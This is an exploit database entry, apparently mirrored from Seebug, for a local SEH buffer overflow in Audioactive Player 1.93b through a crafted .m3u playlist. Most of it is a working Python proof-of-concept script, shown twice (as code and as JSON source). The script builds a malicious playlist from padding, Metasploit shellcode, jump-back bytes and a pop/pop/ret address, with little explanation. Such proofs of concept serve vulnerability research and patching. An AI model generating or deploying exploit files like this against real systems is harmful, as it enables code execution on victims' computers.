Search...

Audioactive Player 1.93b (.m3u) Local Buffer Overflow Exploit (SEH)

2009-05-15T00:00:00

ID SSV:13950
Type seebug
Reporter Root
Modified 2009-05-15T00:00:00

Description

No description provided by source.

                                        
                                            
                                                #usage: exploit.py
#Open the program then double clic in the exploit file
print &quot;**************************************************************************&quot;
print &quot; Audioactive Player 1.93b (.m3u) Local Buffer Overflow Exploit (SEH)\n&quot;
print &quot; Credits : hack4love\n&quot;
print &quot; Seh Exploit: His0k4\n&quot;
print &quot; Tested on: Windows XP Pro SP3 (EN)\n&quot;
print &quot; Greetings to:&quot;
print &quot; All friends &amp; muslims HaCkers(dz),snakespc.com\n&quot;
print &quot;**************************************************************************&quot;       
			
# win32_exec -  EXITFUNC=seh CMD=calc Size=165 Encoder=JmpCallAdditive http://metasploit.com
shellcode=(
&quot;\xfc\xbb\x5d\x53\x65\x97\xeb\x0c\x5e\x56\x31\x1e\xad\x01\xc3\x85&quot;
&quot;\xc0\x75\xf7\xc3\xe8\xef\xff\xff\xff\xa1\xbb\x21\x97\x59\x3c\x21&quot;
&quot;\xd2\x65\xb7\x49\xd8\xed\xc6\x5e\x69\x42\xd1\x2b\x31\x7c\xe0\xc0&quot;
&quot;\x87\xf7\xd6\x9d\x19\xe9\x26\x62\x80\x59\xcc\xa2\xc7\xa6\x0c\xe8&quot;
&quot;\x25\xa9\x4c\x06\xc1\x92\x04\xfd\x2e\x91\x41\x76\x71\x7d\x8b\x62&quot;
&quot;\xe8\xf6\x87\x3f\x7e\x57\x84\xbe\x6b\xec\xa8\x4b\x6a\x19\x59\x17&quot;
&quot;\x49\xd9\x99\x99\x51\x85\x96\x9a\x61\xc0\x69\x62\x8e\x41\x29\x9f&quot;
&quot;\x05\x25\xb6\x32\x92\xad\xce\xa7\xac\xa6\x4f\x87\xaf\xb8\x4f\x63&quot;
&quot;\xc7\x84\x10\x42\xee\x94\xf8\x2d\xf6\xd7\xc5\x55\x57\xbf\x35\x23&quot;
&quot;\x53\x60\xde\xac\xa2\x14\x10\x9a\xa5\xcf\x4e\x45\x36\x6c\x91\x85&quot;
&quot;\xc6\x72\x91\x85\xc6&quot;)

payload = &quot;\x41&quot;*(589-len(shellcode))
payload += shellcode
payload += &quot;\xE9\x56\xFF\xFF\xFF&quot; # go back
payload += &quot;\x74\xF9\xFF\xFF&quot; #go back
payload += &quot;\xDE\x19\xD1\x72&quot; # Friendly p/p/r msacm32.drv
payload += &quot;\x44&quot;*900

try:
    out_file = open(&quot;exploit.m3u&quot;,'w')
    out_file.write(&quot;http://www.google.com/&quot;+payload+&quot;.mp3\r\n&quot;)
    out_file.close()
    raw_input(&quot;\nExploit file created!\n&quot;)
except:
    print &quot;Error&quot;

# sebug.net

JSON Vulners Source

Initial Source

{"sourceData": "\n #usage: exploit.py\n#Open the program then double clic in the exploit file\nprint "**************************************************************************"\nprint " Audioactive Player 1.93b (.m3u) Local Buffer Overflow Exploit (SEH)\\n"\nprint " Credits : hack4love\\n"\nprint " Seh Exploit: His0k4\\n"\nprint " Tested on: Windows XP Pro SP3 (EN)\\n"\nprint " Greetings to:"\nprint " All friends & muslims HaCkers(dz),snakespc.com\\n"\nprint "**************************************************************************" \n\t\t\t\n# win32_exec - EXITFUNC=seh CMD=calc Size=165 Encoder=JmpCallAdditive http://metasploit.com\nshellcode=(\n"\\xfc\\xbb\\x5d\\x53\\x65\\x97\\xeb\\x0c\\x5e\\x56\\x31\\x1e\\xad\\x01\\xc3\\x85"\n"\\xc0\\x75\\xf7\\xc3\\xe8\\xef\\xff\\xff\\xff\\xa1\\xbb\\x21\\x97\\x59\\x3c\\x21"\n"\\xd2\\x65\\xb7\\x49\\xd8\\xed\\xc6\\x5e\\x69\\x42\\xd1\\x2b\\x31\\x7c\\xe0\\xc0"\n"\\x87\\xf7\\xd6\\x9d\\x19\\xe9\\x26\\x62\\x80\\x59\\xcc\\xa2\\xc7\\xa6\\x0c\\xe8"\n"\\x25\\xa9\\x4c\\x06\\xc1\\x92\\x04\\xfd\\x2e\\x91\\x41\\x76\\x71\\x7d\\x8b\\x62"\n"\\xe8\\xf6\\x87\\x3f\\x7e\\x57\\x84\\xbe\\x6b\\xec\\xa8\\x4b\\x6a\\x19\\x59\\x17"\n"\\x49\\xd9\\x99\\x99\\x51\\x85\\x96\\x9a\\x61\\xc0\\x69\\x62\\x8e\\x41\\x29\\x9f"\n"\\x05\\x25\\xb6\\x32\\x92\\xad\\xce\\xa7\\xac\\xa6\\x4f\\x87\\xaf\\xb8\\x4f\\x63"\n"\\xc7\\x84\\x10\\x42\\xee\\x94\\xf8\\x2d\\xf6\\xd7\\xc5\\x55\\x57\\xbf\\x35\\x23"\n"\\x53\\x60\\xde\\xac\\xa2\\x14\\x10\\x9a\\xa5\\xcf\\x4e\\x45\\x36\\x6c\\x91\\x85"\n"\\xc6\\x72\\x91\\x85\\xc6")\n\npayload = "\\x41"*(589-len(shellcode))\npayload += shellcode\npayload += "\\xE9\\x56\\xFF\\xFF\\xFF" # go back\npayload += "\\x74\\xF9\\xFF\\xFF" #go back\npayload += "\\xDE\\x19\\xD1\\x72" # Friendly p/p/r msacm32.drv\npayload += "\\x44"*900\n\ntry:\n out_file = open("exploit.m3u",'w')\n out_file.write("http://www.google.com/"+payload+".mp3\\r\\n")\n out_file.close()\n raw_input("\\nExploit file created!\\n")\nexcept:\n print "Error"\n\n# sebug.net\n\n ", "status": "poc", "description": "No description provided by source.", "sourceHref": "https://www.seebug.org/vuldb/ssvid-13950", "reporter": "Root", "href": "https://www.seebug.org/vuldb/ssvid-13950", "type": "seebug", "viewCount": 3, "references": [], "lastseen": "2017-11-19T18:50:50", "published": "2009-05-15T00:00:00", "cvelist": [], "id": "SSV:13950", "enchantments_done": [], "modified": "2009-05-15T00:00:00", "title": "Audioactive Player 1.93b (.m3u) Local Buffer Overflow Exploit (SEH)", "cvss": {"score": 0.0, "vector": "NONE"}, "bulletinFamily": "exploit", "enchantments": {"score": {"value": 0.6, "vector": "NONE", "modified": "2017-11-19T18:50:50", "rev": 2}, "dependencies": {"references": [], "modified": "2017-11-19T18:50:50", "rev": 2}, "vulnersScore": 0.6}, "immutableFields": []}